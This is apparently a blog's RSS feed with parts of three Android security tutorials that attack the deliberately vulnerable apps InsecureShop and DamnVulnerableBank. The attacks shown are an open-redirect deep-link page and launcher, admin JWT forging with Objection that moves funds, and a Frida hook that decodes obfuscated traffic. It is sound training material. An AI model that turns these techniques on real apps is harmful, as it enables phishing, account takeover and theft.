-   OWASP Mobile Application Security Testing Guide (MASTG) - Biometric Authentication Testing. &quot;OWASP.&quot; Available at: https://mas.owasp.org/MASTG/chapters/0x06b-Testing-Authentication-and-Session-Management</content:encoded><author>Ruben Santos</author></item><item><title>Linking with Confidence: Securing Deep Links in Android Applications</title><link>https://www.kayssel.com/post/android-6</link><guid isPermaLink="true">https://www.kayssel.com/post/android-6</guid><description>Explore the power and security of deep links in Android. Understand traditional and app links, identify vulnerabilities, and learn to exploit them using the &quot;InsecureShop&quot; app. Secure your deep links with URL validation, strict intent filters, and HTTPS to protect against potential threats.</description><pubDate>Sun, 04 Aug 2024 08:35:21 GMT</pubDate><content:encoded># Introduction

Welcome to an in-depth exploration of deep links in Android! Deep links are powerful tools that allow web and mobile applications to direct users to specific content within an app, bypassing the main page. Mastering the intricacies of deep links is essential not only for enhancing user experience but also for identifying and mitigating security vulnerabilities. This chapter will equip you with the knowledge to exploit and secure deep links, ensuring your applications are resilient against potential threats such as open redirects and cross-app attacks.

#### Key Takeaways:

1.  **Types of Deep Links**: Traditional Deep Links and App Links (Universal Links) direct users to specific app content.
2.  **Configuring Deep Links**: Register deep links in the `AndroidManifest.xml` file to define which activities to open.
3.  **Detecting Vulnerabilities**: Use static and dynamic analysis to identify broad configurations and improper data handling.
4.  **Exploitation Example**: Demonstrate vulnerabilities using a vulnerable app (&quot;InsecureShop&quot;) and create a malicious webpage.
5.  **Preventing Vulnerabilities**: Validate and sanitize URL parameters, restrict broad intent filters, implement user confirmation, and use secure WebView settings.

# Deep Links in Android

Deep links in Android are URLs that allow web and mobile applications to direct users to specific content within an app rather than the main page. They work similarly to web links in a browser but open a specific view or activity within a mobile app instead of a webpage.

There are two main types of deep links in Android:

1.  **Traditional Deep Links**: These links take the user directly to a specific part of the app if the app is already installed. An example of a traditional deep link is `myapp://details?id=123`, where `myapp` is the URL scheme registered by the app, and `details?id=123` is the path and parameters indicating the specific content to be displayed.
2.  **App Links (Universal Links)**: Introduced in Android 6.0 (Marshmallow), these links work for users who have the app installed as well as those who don’t. If the app is installed, the link opens the app directly to the corresponding view. If not, the user is redirected to the app store to download it. An example of an app link is `https://www.example.com/details?id=123`, where `example.com` is the domain verified by the app.

![](/content/images/2024/07/image-5.png)

Deeplink Vulnerability Example

The primary difference between App Links and traditional deep links in Android is that App Links use standard HTTP or HTTPS URLs, allowing them to function whether or not the app is installed on the user&apos;s device. If the app is installed, App Links open the app directly; if not, they open in a web browser or redirect the user to the app store. In contrast, traditional deep links use custom URL schemes and only work if the app is already installed, failing to function properly otherwise.

To use deep links in an Android application, it&apos;s necessary to register them in the `AndroidManifest.xml` file. This registration allows the Android system to know which activities to open when a specific deep link is clicked.

```xml
&lt;activity android:name=&quot;.DetailActivity&quot;&gt;
    &lt;intent-filter&gt;
        &lt;action android:name=&quot;android.intent.action.VIEW&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.DEFAULT&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.BROWSABLE&quot;/&gt;

        &lt;!-- URL scheme for traditional deep link --&gt;
        &lt;data android:scheme=&quot;myapp&quot; android:host=&quot;details&quot; /&gt;
    &lt;/intent-filter&gt;
&lt;/activity&gt;

```

&lt;details&gt;
&lt;summary&gt;For an App Link:&lt;/summary&gt;

```xml
&lt;activity android:name=&quot;.DetailActivity&quot;&gt;
    &lt;intent-filter android:autoVerify=&quot;true&quot;&gt;
        &lt;action android:name=&quot;android.intent.action.VIEW&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.DEFAULT&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.BROWSABLE&quot;/&gt;

        &lt;!-- URL pattern for app link --&gt;
        &lt;data android:scheme=&quot;https&quot; android:host=&quot;www.example.com&quot; android:pathPrefix=&quot;/details&quot; /&gt;
    &lt;/intent-filter&gt;
&lt;/activity&gt;

```
&lt;/details&gt;


A summary of what the different fields mean is as follows:

-   **Activity Declaration**: Specifies which activity handles the deep link. Example: `&lt;activity android:name=&quot;.DetailActivity&quot;&gt;`.
-   **Intent Filter**: Defines the criteria for starting the activity. Includes actions, categories, and data elements.
-   **Action**: `android.intent.action.VIEW` indicates the activity can handle view actions, suitable for deep links.
-   **Categories**:`android.intent.category.DEFAULT`: Ensures the intent can be matched by the system.`android.intent.category.BROWSABLE`: Allows the link to be opened from a web browser or other apps.
-   **Data**:**Traditional Deep Links**: `&lt;data android:scheme=&quot;myapp&quot; android:host=&quot;details&quot; /&gt;` specifies a custom URL scheme and host.**App Links**: `&lt;data android:scheme=&quot;https&quot; android:host=&quot;www.example.com&quot; android:pathPrefix=&quot;/details&quot; /&gt;` specifies a web URL pattern.
-   **Auto Verify**: `android:autoVerify=&quot;true&quot;` (for App Links) directs the system to verify the app’s association with the domain, ensuring the app handles the URL if installed.

## Example of a vulnerable Deeplink

Poorly configured deep links can introduce significant security vulnerabilities to an application. Understanding these weaknesses is crucial for identifying potential exploitation points. Let’s explore an example of such a configuration and understand why it&apos;s problematic.

Here’s an example from the `AndroidManifest.xml`:

**`AndroidManifest.xml`**:

```xml
&lt;activity android:name=&quot;.DetailActivity&quot;&gt;
    &lt;intent-filter&gt;
        &lt;action android:name=&quot;android.intent.action.VIEW&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.DEFAULT&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.BROWSABLE&quot;/&gt;
        
        &lt;!-- Overly broad URL scheme and path pattern --&gt;
        &lt;data android:scheme=&quot;myapp&quot; android:host=&quot;*&quot; android:pathPattern=&quot;.*&quot;/&gt;
    &lt;/intent-filter&gt;
&lt;/activity&gt;


```

This setup is problematic because it uses overly broad filters. Specifically, `android:host=&quot;*&quot;` and `android:pathPattern=&quot;.*&quot;` allow any host and any path to trigger the activity, which is too permissive and can inadvertently expose sensitive parts of the app.

In the corresponding activity, the handling of the deep link might look like this:

```java
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_detail);

    // Handle the intent
    Intent intent = getIntent();
    Uri data = intent.getData();
    if (data != null) {
        String itemId = data.getQueryParameter(&quot;id&quot;);
        // Directly use itemId without validation
        // Redirect based on user input
        String redirectUrl = data.getQueryParameter(&quot;redirect&quot;);
        if (redirectUrl != null) {
            Intent browserIntent = new Intent(Intent.ACTION_VIEW, Uri.parse(redirectUrl));
            startActivity(browserIntent);
        }
    }
}

```

Here, several issues arise. First, the `itemId` parameter is used directly without any validation, opening the door to injection attacks if malicious data is provided. Second, the `redirectUrl` parameter allows for redirection based on user input without validation, creating an open redirect vulnerability which can be exploited for phishing attacks.

### Detecting Poorly Configured Deep Links

To identify poorly configured deep links, both static and dynamic analysis are necessary.

**Static Analysis** involves reviewing the `AndroidManifest.xml` file and the activity code. Look for intent filters with overly broad configurations, such as `android:host=&quot;*&quot;` or `android:pathPattern=&quot;.*&quot;`. These are too permissive and should be avoided. Additionally, scrutinize how data from the intent is handled within the activity.

**Dynamic Analysis** involves testing the app by crafting various deep links to observe its behavior. For example, you might use a link like `myapp://unauthorized/path` to test if the app improperly grants access to restricted areas. Another test could involve `myapp://details?id=123&amp;redirect=http://malicious-site.com` to check for open redirect vulnerabilities.

# DeepLink Exploitation

## Installing the vulnerable application

To demonstrate the attack, I will use a vulnerable application called &quot;InsecureShop.&quot; The installation process is quite straightforward using ADB:

```bash
adb connect &lt;ip&gt;
adb install &lt;apk&gt;

```

[Releases · hax0rgb/InsecureShop](https://github.com/hax0rgb/InsecureShop/releases)

## Static Analysis

Next, to determine if the application is vulnerable to DeepLink, we can start with a brief static analysis of the code. To do this, we first need to decompile the APK. As we&apos;ve done in previous chapters of this series, we can use tools like `apkx` for this purpose. This tool will allow us to access the entire code of the APK.

```bash
apkx InsecureShop.apk

```

[GitHub - skylot/jadx: Dex to Java decompiler](https://github.com/skylot/jadx)

Alternatively, you can use `jadx`, another APK decompiler. The advantage of this tool is that it features a GUI, allowing you to interact directly with the Java code. To start the decompilation process, simply navigate to **File** -&gt; **Open File** and select the APK.

![](/content/images/2024/07/image-13.png)

Open the APK with Jadx

After this, as I mentioned earlier, we should first inspect the `AndroidManifest.xml` file to check the configuration of the DeepLinks. Upon doing this, I noticed that the `WebViewActivity` specifies the scheme and host but not the path. Because of this, if the code managing the activity doesn&apos;t implement proper controls over the link parameters, it could lead to vulnerabilities such as open redirects.

![](/content/images/2024/07/image-8.png)

Vulnerable WebViewActivity

To locate the code for the activity, we can search for &quot;WebViewActivity&quot; using the search function in jadx by navigating to **Navigation** -&gt; **Text Search**. Once the activity is found, we can examine the configuration used to invoke it.

![](/content/images/2024/07/image-9.png)

Settings that can make the Webview more vulnerable

The two most important settings are `setJavaScriptEnabled` and `setAllowUniversalAccessFromFileURLs`.

-   **setJavaScriptEnabled**: This setting determines whether JavaScript is enabled within the WebView. Enabling JavaScript (`setJavaScriptEnabled(true)`) allows for interactive features and enhanced functionality in web content. However, it also opens up the risk of Cross-Site Scripting (XSS) attacks if not properly managed.
-   **setAllowUniversalAccessFromFileURLs**: This setting controls whether JavaScript running in a file URL context can access content from any origin, including other file URLs or remote servers. While it can be useful for certain functionalities, enabling this setting (`setAllowUniversalAccessFromFileURLs(true)`) can introduce severe security risks, such as arbitrary file access and cross-context scripting.

![](/content/images/2024/07/image-10.png)

Vulnerable Code

The code snippet is responsible for managing the WebView in the application, specifically handling different URI paths and loading URLs. Let&apos;s break down the functionality and discuss potential security implications.

1.  **URI Handling**:
    -   The code first checks the URI path provided in the intent. It distinguishes between two specific paths: `/web` and `/webview`.
    -   If the path is `/webview`, the code retrieves the `url` query parameter from the intent&apos;s data using `getQueryParameter(&quot;url&quot;)`.
2.  **Domain Validation**:
    -   The application checks if the extracted URL ends with the domain `insecureshopapp.com`. This check aims to ensure that the URL belongs to a trusted domain.
    -   If the URL passes this domain validation, it is assigned to the `data` variable.
3.  **WebView Loading**:
    -   If the `data` variable is not `null`, the URL is loaded into the WebView using `webview.loadUrl(data);`.
    -   Additionally, the URL is saved in the application preferences using `Prefs.INSTANCE.getInstance(this).setData(data);`.

The code&apos;s domain validation only checks if the URL ends with `insecureshopapp.com`. This method can be bypassed if an attacker crafts a URL such as `http://malicious-site.com?url=http://insecureshopapp.com`. This can lead to an open redirect vulnerability, where the user might be redirected to a malicious site, potentially compromising their data or security.

## Dynamic Analysis

At this point, we have a solid understanding of how to exploit deeplinks within the application. Now, let&apos;s proceed to exploit the vulnerability. To do this, we will create a webpage containing a link that we control, which needs to be clicked by the victim. The link will be a specially crafted deeplink that, when clicked, will trigger the vulnerable activity in the insecureShop application. This deeplink will cause the app to load a URL of our choosing, potentially redirecting the user to a malicious site or triggering other unintended actions within the app.

![](/content/images/2024/07/image-14.png)

Attack Diagram

With this purpose in mind, I&apos;ll use the following HTML code for the webpage. As you can see, it simply displays a GIF of Pikachu. However, when the user clicks on this GIF, they will be redirected to the insecureShop application via a deeplink.

```html
&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
&lt;head&gt;
    &lt;meta charset=&quot;UTF-8&quot;&gt;
    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;
    &lt;title&gt;Super Secure Site&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
        &lt;h1&gt;Click Here!&lt;/h1&gt;
    &lt;a href=&quot;insecureshop://com.insecureshop/web?url=https://kayssel.com&quot;&gt;
        &lt;img src=&quot;https://i.pinimg.com/originals/1f/0b/85/1f0b85bb750807778b1fe2444527fbd2.gif&quot; alt=&quot;Pikachu GIF&quot; width=&quot;200&quot;&gt;
    &lt;/a&gt;
&lt;/body&gt;
&lt;/html&gt;

```

In this example, the `a` tag contains a link with a custom URI scheme (`insecureshop://`) that is intended to trigger the InsecureShop application. The `url` parameter points to the malicious site (`https://kayssel.com`). When a user clicks the Pikachu GIF, they will be redirected to this URL within the InsecureShop app, demonstrating how an open redirect can be exploited to direct users to potentially harmful sites.

![](/content/images/2024/07/image-16.png)

Evidence of the vulnerable application

## Cross App Attacks

This Proof of Concept (PoC) demonstrates how to exploit the vulnerability using an open redirect attack. However, there are other types of attacks that can also be performed. For instance, an attacker could create another mobile application designed to launch the vulnerable activity in the insecureShop app. This type of attack is known as a &quot;Cross-App&quot; attack and operates in a similar manner.

In a Cross-App attack, the malicious app triggers the deeplink in the target application, potentially leading users to malicious websites or extracting sensitive data. This attack leverages the fact that deeplinks can be invoked by external applications, making it a powerful vector for exploitation.

There are two ways to simulate this attack. The first method, which is the most realistic, involves creating another app using Java. However, this approach is time-consuming and will not be demonstrated here. Nonetheless, here&apos;s a basic example of how such an implementation might look:

```java

import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;

public class LaunchDeeplinkActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // The deeplink URL to trigger
        String deeplinkUrl = &quot;insecureshop://com.insecureshop/web?url=https://malicious-site.com&quot;;

        // Create an intent to trigger the deeplink
        Intent intent = new Intent(Intent.ACTION_VIEW);
        intent.setData(Uri.parse(deeplinkUrl));

        // Check if the intent can be handled
        if (intent.resolveActivity(getPackageManager()) != null) {
            startActivity(intent);
        } else {
            // Handle the situation where the app is not installed or cannot handle the deeplink
            System.out.println(&quot;No application can handle this intent.&quot;);
        }

        // Optionally finish the activity if no UI is needed
        finish();
    }
}

```

The second method involves simulating the attack using ADB, which is quicker and more practical for our demonstration purposes. The following ADB command can be used to trigger the same Deeplink from a connected device or emulator:

```bash
adb shell am start -W -a android.intent.action.VIEW -d &quot;insecureshop://com.insecureshop/web?url=https://kayssel.com&quot;

```

![](/content/images/2024/08/image.png)

ADB starting the new activity

![](/content/images/2024/08/image-1.png)

Webpage loaded into the webview

This command starts an intent with the action `android.intent.action.VIEW` and the specified data URI. It effectively simulates the deeplink being triggered by another application or a browser. This approach is particularly useful for testing and demonstrating vulnerabilities without the need to develop a separate app.

# Securing Deep Links in Android

After exploring how deep links work and understanding the various attacks that can exploit them, let&apos;s now focus on how to secure them effectively. Here are two critical strategies to ensure secure deep link handling:

**Validate and Sanitize URL Parameters**: Ensure all parameters extracted from deep links are validated and sanitized to prevent injection attacks. This involves checking that the URL parameters conform to expected formats and originate from trusted sources.

```java
Uri data = intent.getData();
if (data != null) {
    String url = data.getQueryParameter(&quot;url&quot;);
    if (url != null &amp;&amp; url.startsWith(&quot;https://trusted-domain.com&quot;)) {
        webview.loadUrl(url);
    } else {
        webview.loadUrl(&quot;https://trusted-domain.com/error&quot;);
    }
}


```

**Use Strict Intent Filters**: Configure intent filters narrowly in the `AndroidManifest.xml` to limit which URLs can trigger activities. This reduces the risk of unauthorized deep links activating sensitive parts of your app.

```xml
&lt;activity android:name=&quot;.DetailActivity&quot;&gt;
    &lt;intent-filter&gt;
        &lt;action android:name=&quot;android.intent.action.VIEW&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.DEFAULT&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.BROWSABLE&quot;/&gt;
        &lt;data android:scheme=&quot;myapp&quot; android:host=&quot;details&quot;/&gt;
    &lt;/intent-filter&gt;
&lt;/activity&gt;


```

# Conclusions

In this chapter, we delved into the workings of deep links in Android, highlighting their power to direct users to specific content within an app. We examined the two main types of deep links—Traditional Deep Links and App Links —and learned how they enhance user experience by providing seamless navigation to app-specific content.

However, with these conveniences come potential security risks. We explored various vulnerabilities associated with deep links, such as open redirects and cross-app attacks, and demonstrated how these can be exploited through both static and dynamic analysis. Using the &quot;InsecureShop&quot; app as a case study, we illustrated how attackers could manipulate improperly configured deep links to compromise user data and application integrity.

To mitigate these risks, we emphasized the importance of securing deep links through rigorous validation and sanitization of URL parameters, the use of strict intent filters, and implementing user confirmations for actions leading outside the app. Ensuring all URLs use HTTPS further protects against man-in-the-middle attacks, and regularly reviewing and updating security practices helps keep vulnerabilities at bay.

# Resources

-   Insecure Shop: An Introduction to Android App Exploitation. &quot;HackMD.&quot; Available at: [https://hackmd.io/@avila-pwn-notes/HyB1KnK7c](https://hackmd.io/@avila-pwn-notes/HyB1KnK7c)
-   OWASP Mobile Application Security Testing Guide (MASTG) - Deep Link Testing. &quot;OWASP.&quot; Available at: [https://mas.owasp.org/MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#static-analysis](https://mas.owasp.org/MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#static-analysis)
-   Tell Your Phone to Link Me at the Coffee Shop. &quot;KnifeCoat.&quot; Available at: [https://knifecoat.com/Posts/Tell+you+phone+to+link+me+at+the+coffee+shop](https://knifecoat.com/Posts/Tell+you+phone+to+link+me+at+the+coffee+shop)
-   Android Deep Links Exploitation. &quot;Z4ki Medium.&quot; Available at: [https://z4ki.medium.com/android-deep-links-exploitation-4abade4d45b4](https://z4ki.medium.com/android-deep-links-exploitation-4abade4d45b4)
-   Android Developers Guide - Deep Links. &quot;Android Developers.&quot; Available at: [https://developer.android.com/training/app-links/deep-linking](https://developer.android.com/training/app-links/deep-linking)
-   Security Best Practices for WebView. &quot;Android Developers.&quot; Available at: [https://developer.android.com/guide/webapps/webview#best-practices](https://developer.android.com/guide/webapps/webview#best-practices)
-   Jadx - Dex to Java Decompiler. &quot;GitHub.&quot; Available at: [https://github.com/skylot/jadx](https://github.com/skylot/jadx)
-   APKX - APK Decompiler. &quot;GitHub.&quot; Available at: [https://github.com/b-mueller/apkx](https://github.com/b-mueller/apkx)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering Android Activity Hacking: Techniques and Tools</title><link>https://www.kayssel.com/post/android-5</link><guid isPermaLink="true">https://www.kayssel.com/post/android-5</guid><description>This article explores using Objection to investigate and manipulate Android activities. It highlights uncovering hidden features, exploiting vulnerabilities like insecure JWTs, and the importance of securing applications to protect against significant security risks.</description><pubDate>Sun, 07 Jul 2024 10:01:20 GMT</pubDate><content:encoded># Introduction

In this article, we will delve into the exploration of activities within an Android application using Objection. Activities in Android are a crucial component, serving as the entry point for interacting with users. They represent individual screens with user interfaces, much like windows or pages in a web application. Each activity operates independently but can communicate with others to perform various tasks, such as displaying a list of emails or composing a new one in an email app.

Understanding activities is essential for Android development as they form the backbone of the user interface and user experience. However, activities also come with certain security risks. Intent spoofing, where malicious apps start or interact with activities in unintended ways, and data leakage, where sensitive information is improperly secured, are notable risks.

In this article, we will focus on how to investigate and manipulate activities using Objection. We will cover the following key points:

-   **Exploring Activities**: Launching Objection, listing, and examining activities within an application.
-   **Identifying Hidden Features**: Discovering and interacting with activities not available to regular users.
-   **Combining Vulnerabilities**: Using previously discussed JWT vulnerabilities to gain unauthorized access and perform administrative tasks.

By the end of this article, you will have a better understanding of how to use Objection to explore and manipulate activities within an Android application, as well as how to identify and exploit security vulnerabilities.

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    It is recommended to read the &lt;a href=&quot;https://www.kayssel.com/series/android/&quot;&gt;previous chapters&lt;/a&gt; of this series to fully understand the process discussed in this article. Prior knowledge of concepts such as JWT vulnerabilities and basic usage of Objection will be beneficial for following along with the demonstrations and explanations provided.
  &lt;/div&gt;
&lt;/div&gt;

# What Are Android Activities?

An activity in Android is a crucial component that serves as the entry point for interacting with the user. It represents a single screen with a user interface, akin to a window or a page in a web application. When you open an app, the first thing you typically see is an activity.

Each activity in an Android app is independent but can communicate with other activities to perform different tasks. For instance, an email app might have one activity for displaying a list of emails and another for composing a new email. These activities work together to provide a seamless user experience.

In technical terms, an activity is a subclass of the `Activity` class in the Android framework. Developers can override lifecycle methods such as `onCreate()`, `onStart()`, `onResume()`, `onPause()`, `onStop()`, and `onDestroy()` to manage how the activity behaves when it’s created, displayed, paused, stopped, and destroyed.

## Security-Related Risks of Activities in Android

While activities are essential for creating dynamic and interactive Android applications, they also come with certain security risks that developers should be aware of:

**Intent Spoofing**: Activities can be started by intents, and if not properly secured, malicious apps can exploit this to start or interact with activities in unintended ways. This can lead to unauthorized access to sensitive data.

**Data Leakage**: If activities handle sensitive information and do not properly secure it, there is a risk of leaking this data. For example, information can be exposed through logs, improperly secured intents, or unprotected public components.

In this article, I will demonstrate how vulnerabilities in activities, such as insecure JWTs, can be exploited. By combining these vulnerabilities, attackers can gain unauthorized access and perform administrative tasks, highlighting the critical need for robust security measures in Android applications.

# Step-by-Step Exploration with Objection

To begin using Objection for exploring the activities of an Android application, execute the following command:

```bash
objection -N -h 192.168.20.143 --gadget &quot;DamnVulnerableBank&quot; explore

```

![](/content/images/2024/07/image-1.png)

Launching objection

Once inside Objection, you can list all the different activities using the following command:

```bash
android hooking list activities

```

![](/content/images/2024/06/image-24.png)

Activity list

After this, to explore the various activities within the application, you can launch any activity you think of. For example, to display the user&apos;s profile, you can use the following command:

```bash
android intent launch_activity com.app.damnvulnerablebank.Myprofile

```

![](/content/images/2024/07/image-2.png)

Launching MyProfile Activity

As you can see, this allows us to easily launch the different activities of the application.

Upon further inspection of the activities, we can notice that there are some activities listed by Objection that do not appear in the user interface for a regular user. One such activity is labeled &quot;SendMoney.&quot;. Let&apos;s investigate it by launching it:

```bash
android intent launch_activity com.app.damnvulnerablebank.SendMoney

```

![](/content/images/2024/06/image-25.png)

SendMoney Activity

This activity appears to allow money to be sent to arbitrary accounts by specifying the amount. If you try to enter your account number (which you can find in the user profile) and the amount, you will encounter an error stating that you do not have sufficient permissions. It seems to be an administrator-only feature, allowing money to be added from the administrator&apos;s account.

![](/content/images/2024/06/image-26.png)

Account Number of my current user

So, I think we have a couple of vulnerabilities that, when combined, could create a bigger one. For example, we can try to add our user to the admin&apos;s beneficiaries to send money from his account to our user&apos;s account. We will be able to do this thanks to the vulnerability in the JWT that we found in a [previous chapter](https://www.kayssel.com/post/android-3/) of the series.

Therefore, having this plan in mind, we must first add our user to the admin&apos;s beneficiaries. To add the user&apos;s account as a beneficiary, we must launch the corresponding functionality:

```bash
android intent launch_activity com.app.damnvulnerablebank.AddBeneficiary

```

After that, we need to enter our account number in the activity. Subsequently, capture the request with Burp in order to modify the JWT. Change the data so that the username is &quot;admin&quot; and set the &quot;is\_admin&quot; property to &quot;true&quot;. After this, use the JWT secret, which is &quot;secret&quot;, to recalculate the signature to a valid one.

![](/content/images/2024/06/image-28.png)

Capturing the add beneficiary request

![](/content/images/2024/06/image-29.png)

Changing the JWT valus using the JWT editor of Burp

Once you&apos;ve done that, launch the &quot;Pending Beneficiary&quot; activity to accept our user as an admin beneficiary. Remember, you&apos;ll need to modify the JWT of the request in Burp because this action can only be performed by an administrator user.

```bash
android intent launch_activity com.app.damnvulnerablebank.PendingBeneficiary

```

![](/content/images/2024/06/image-30.png)

Request to access the pending beneficiary acitivity

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    If you want, you can create an admin JWT and insert it into the following file: `/data/user/0/com.app.damnvulnerablebank/shared_prefs/jwt.xml`. This will let you access the app as an admin user and allow you to navigate more easily through the application. Otherwise, you will need to change each JWT of each request using Burp to set it as an admin.
  &lt;/div&gt;
&lt;/div&gt;

After clicking on the relevant section for your user account, you&apos;ll be prompted to enter the operation ID to confirm it. In my case, the ID was &quot;4&quot;.

![](/content/images/2024/06/image-32.png)

Pending beneficiary activity

Once the account has been approved as a beneficiary, the &quot;ViewBeneficiary&quot; activity should display something akin to the following:

```bash
android intent launch_activity com.app.damnvulnerablebank.ViewBeneficiary

```

![](/content/images/2024/06/image-33.png)

ViewBeneficiary Activity

This evidence indicates that the user account in question is a beneficiary of the administration account. Consequently, the SendMoney activity can be employed to transfer funds to the aforementioned account.

```bash
android intent launch_activity com.app.damnvulnerablebank.SendMoney

```

![](/content/images/2024/06/image-35.png)

Sending money to our user account

At last, we can verify that the figure displayed in our profile has been updated to &quot;10000&quot; rather than &quot;10050&quot;.

![](/content/images/2024/07/image.png)

Evidence that our user&apos;s money have increased by 50.

# Conclusions

In this article, we explored how to use Objection to investigate and manipulate activities within an Android application. By understanding Android activities and leveraging tools like Objection, we uncovered hidden features and potential security vulnerabilities.

We demonstrated how to interact with various activities, identify those not accessible to regular users, and exploit vulnerabilities such as insecure JWTs to gain unauthorized access. This highlights the importance of thoroughly testing and securing applications to protect against combined vulnerabilities that pose significant security risks.

# References

-   Android Developer Documentation: Activities. &quot;Android Developers.&quot; Available at: [https://developer.android.com/guide/components/activities/](https://developer.android.com/guide/components/activities/)
-   Objection Documentation. &quot;Objection Documentation.&quot; Available at: [https://github.com/sensepost/objection](https://github.com/sensepost/objection)
-   Burp Suite Documentation. &quot;Burp Suite Documentation.&quot; Available at: https://portswigger.net/burp/documentation
-   OWASP Mobile Security Testing Guide. &quot;OWASP Mobile Security Testing Guide.&quot; Available at: https://owasp.org/www-project-mobile-security-testing-guide/
-   Android Security: Exploiting Intent Spoofing. &quot;OWASP Intent Spoofing.&quot; Available at: https://www.owasp.org/index.php/Intent\_Spoofing
-   InsecureBankv2: A Vulnerable Android Application for Security Testing. &quot;InsecureBankv2.&quot; Available at: [https://github.com/dineshshetty/Android-InsecureBankv2](https://github.com/dineshshetty/Android-InsecureBankv2)</content:encoded><author>Ruben Santos</author></item><item><title>Cracking the Code: Exploring Reverse Engineering and MobSF for Mobile App Security</title><link>https://www.kayssel.com/post/android-4</link><guid isPermaLink="true">https://www.kayssel.com/post/android-4</guid><description>In this chapter, we decoded server responses through APK reverse engineering, uncovering obfuscation techniques. We also introduced MobSF for automated security analysis, identifying vulnerabilities and enhancing the security posture of mobile applications.</description><pubDate>Sun, 23 Jun 2024 12:30:18 GMT</pubDate><content:encoded># Introduction

[In our previous discussions](https://www.kayssel.com/post/android-3/), we delved into the theoretical aspect of creating new JWTs after compromising its secret. Despite this, we faced a challenge where the server&apos;s responses were encoded, and the front end of the application displayed no information, leaving us in the dark about the underlying issues. In this chapter, we aim to decode the server&apos;s responses by examining the application&apos;s code. Additionally, we will introduce MobSF (Mobile Security Framework) as a robust tool for performing automated security analysis of mobile applications. This comprehensive approach will help us gain deeper insights into the application&apos;s behavior and enhance its security posture.

Key takeaways from this chapter include:

-   **Decoding Server Responses:** Understanding how to decode the encoded server responses to uncover vital information.
-   **Reverse Engineering APKs:** Techniques to extract and analyze the Java code from APK files.
-   **Understanding Obfuscation:** Insights into obfuscation techniques used in encoding and decoding data.
-   **Using Frida for Dynamic Analysis:** Leveraging Frida scripts to intercept and analyze data in real-time.
-   **Utilizing MobSF:** Introducing MobSF as a powerful tool for static and dynamic analysis of mobile applications.

# Reverse Engineering

The first thing we need to do to study the application&apos;s code is to obtain the Java code from the APK. To achieve this, we can use apkx, just as we did in the [first chapter](https://www.kayssel.com/post/android-1/) of this series.

[GitHub - muellerberndt/apkx at content.kayssel.com](https://github.com/muellerberndt/apkx)

```bash
apkx dvba-no-gpu.apk

```

After obtaining the code, we need to search for the `Profile` class to try to understand what is happening.

![](/content/images/2024/06/image-9.png)

Searching for the profile class

Once we have found the class, we can perform a bit of reverse engineering to discover that the class containing the code to encode the data is `e`.

![](/content/images/2024/06/image-1.png)

Encode method

![](/content/images/2024/06/image-3.png)

Package with the methods that encode the data

The class `e` provides functionality to encode and decode strings using Base64, with an added layer of obfuscation. The obfuscation is achieved by XOR-ing each character of the input string with a repeating sequence of characters from the word `&quot;amazing&quot;`.

1.  **`a` method**: Decodes a Base64 encoded string and then obfuscates it.
2.  **`b` method**: Obfuscates a string and then encodes it in Base64.
3.  **`c` method**: Obfuscates a string using a simple XOR-based technique.

We can deduce that the encoded data is built by first using Base64 encoding and then applying an XOR operation with the key `&quot;amazing&quot;`.

![](/content/images/2024/06/image-2.png)

Class `e`

With this information, we can develop a Frida script that prints both the encoded data and the decoded data:

```javascript
// Delay execution to ensure proper Java environment setup
setTimeout(function() {
    Java.perform(function() {
        var CryptClass = Java.use(&quot;c.b.a.e&quot;); // Locate the class c.b.a.e

        // Hooking method &apos;a&apos; to intercept encrypted data
        CryptClass.a.implementation = function(encryptedData) {
            console.log(&quot;Encrypted Data: &quot; + encryptedData); // Log encrypted data
            var responseData = this.a(encryptedData); // Execute original method
            console.log(&quot;Response Data: &quot; + responseData); // Log decrypted response data
            return responseData; // Return the original method&apos;s result
        };
    });
}, 10); // Wait 10ms before executing

// Delay execution to ensure proper Java environment setup
setTimeout(function() {
    Java.perform(function() {
        var CryptClass = Java.use(&quot;c.b.a.e&quot;); // Locate the class c.b.a.e

        // Hooking method &apos;b&apos; to intercept request data
        CryptClass.b.implementation = function(requestData) {
            console.log(&quot;Request Data: &quot; + requestData); // Log plaintext request data
            var encryptedResponse = this.b(requestData); // Execute original method
            console.log(&quot;Encrypted Data: &quot; + encryptedResponse); // Log encrypted response data
            return encryptedResponse; // Return the original method&apos;s result
        };
    });
}, 10); // Wait 10ms before executing


```

As you can see in the following image, now, when we enter the profile section of the application, Frida will report both the encoded and decoded data.

![](/content/images/2024/06/image-4.png)

Encoded and decoded data

However, for some reason, when I change the user&apos;s JWT, the data does not appear in the terminal using Frida. Therefore, I decided to develop a small Python script to decode the data. This way, I can get the encoded data from a response after changing the JWT and decode the information.

![](/content/images/2024/06/image-11.png)

&lt;details&gt;
&lt;summary&gt;Encoded data after changing the JWT to try to impersonate the user beru&lt;/summary&gt;

```bash
